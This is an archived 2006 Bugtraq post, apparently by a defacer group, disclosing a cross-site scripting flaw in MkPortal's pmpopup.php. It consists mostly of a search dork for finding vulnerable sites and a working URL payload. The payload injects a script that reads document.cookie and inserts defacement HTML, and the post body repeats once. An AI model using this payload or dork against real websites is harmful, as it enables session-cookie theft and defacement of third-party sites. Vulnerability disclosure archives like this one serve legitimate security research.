Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
Back to list
|
Post reply
MkPortal Cross Site Scripting (All versions) xSS
Sep 27 2006 08:27PM
vannovax gmail com
#By: HanowarS
#mail: vannovax[at]gmail.com
#Greetz: Nettoxic, _Antrax_, Fr34k, SSH-2, xarnuz
#web: www.div.com.ve and www.c-group.org
#ALL VERSIONS!!
# Latin American Defacers
############################
Dork:
MKPortal M1.1 Rc1 ©2003-2005 All rights reserved
Hilo:
/mkportal/include/pmpopup.php?u1=www.c-group.org&m1=<script>alert(docume
nt.cookie)</script>&m2=<h1>h4x0r3d</h1>&m3=by&m4=<h1>HANOWARS</h1>
Affected File:
pmpopup.php
Example:
http://www.example.com/mkportal/include/pmpopup.php?u1=www.c-group.org&m
1=<script>alert(document.cookie)</script>&m2=<h1>h4x0r3d</h1>&m3=by&m4=<
h1>HANOWARS</h1>
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
#mail: vannovax[at]gmail.com
#Greetz: Nettoxic, _Antrax_, Fr34k, SSH-2, xarnuz
#web: www.div.com.ve and www.c-group.org
#ALL VERSIONS!!
# Latin American Defacers
############################
Dork:
MKPortal M1.1 Rc1 ©2003-2005 All rights reserved
Hilo:
/mkportal/include/pmpopup.php?u1=www.c-group.org&m1=<script>alert(docume
nt.cookie)</script>&m2=<h1>h4x0r3d</h1>&m3=by&m4=<h1>HANOWARS</h1>
Affected File:
pmpopup.php
Example:
http://www.example.com/mkportal/include/pmpopup.php?u1=www.c-group.org&m
1=<script>alert(document.cookie)</script>&m2=<h1>h4x0r3d</h1>&m3=by&m4=<
h1>HANOWARS</h1>
[ reply ]